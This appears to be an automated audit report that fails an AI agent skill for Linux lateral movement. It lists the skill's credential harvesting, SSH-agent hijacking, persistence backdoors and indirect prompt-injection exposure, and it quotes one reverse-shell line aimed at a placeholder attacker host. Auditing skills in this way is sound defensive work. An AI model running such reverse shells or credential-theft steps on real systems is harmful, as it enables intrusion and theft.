linux-lateral-movement
Fail
Audited by Gen Agent Trust Hub on Apr 9, 2026
Risk Level: HIGH
COMMAND_EXECUTION, DATA_EXFILTRATION, REMOTE_CODE_EXECUTION, CREDENTIALS_UNSAFE, EXTERNAL_DOWNLOADS, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: Provides numerous commands for system exploitation, including hijacking SSH agents via socket discovery, monitoring for new sockets in `/tmp`, and interacting with D-Bus services to manipulate system units.
- [DATA_EXFILTRATION]: Details comprehensive methods for harvesting sensitive information, such as password hashes from `/etc/shadow`, SSH private keys, shell histories, and application configuration files containing API keys and database credentials.
- [REMOTE_CODE_EXECUTION]: Includes explicit templates for establishing reverse shells (e.g., `bash -i >& /dev/tcp/ATTACKER/4444 0>&1`) and instructions for using tunneling tools to facilitate remote network access.
- [CREDENTIALS_UNSAFE]: Actively targets and searches for high-value credentials, including SSH private keys, `.env` files, and database connection strings across the filesystem.
- [PERSISTENCE]: Explains techniques for maintaining long-term access, such as injecting attacker-controlled public keys into `authorized_keys` and creating malicious systemd services to run backdoors on startup.
- [PROMPT_INJECTION]: The skill possesses a vulnerability surface for indirect prompt injection. It ingests untrusted data from process environments (`/proc/*/environ`), shell histories, and remote network shares (NFS/SMB) without implementing boundary markers or sanitization, while maintaining access to dangerous shell execution capabilities.
- [EXTERNAL_DOWNLOADS]: References external third-party repositories and tools for exploitation, such as `sudo_inject` on GitHub and the network tunneling tool Chisel.
Recommendations
- AI detected serious security threats
Audit Metadata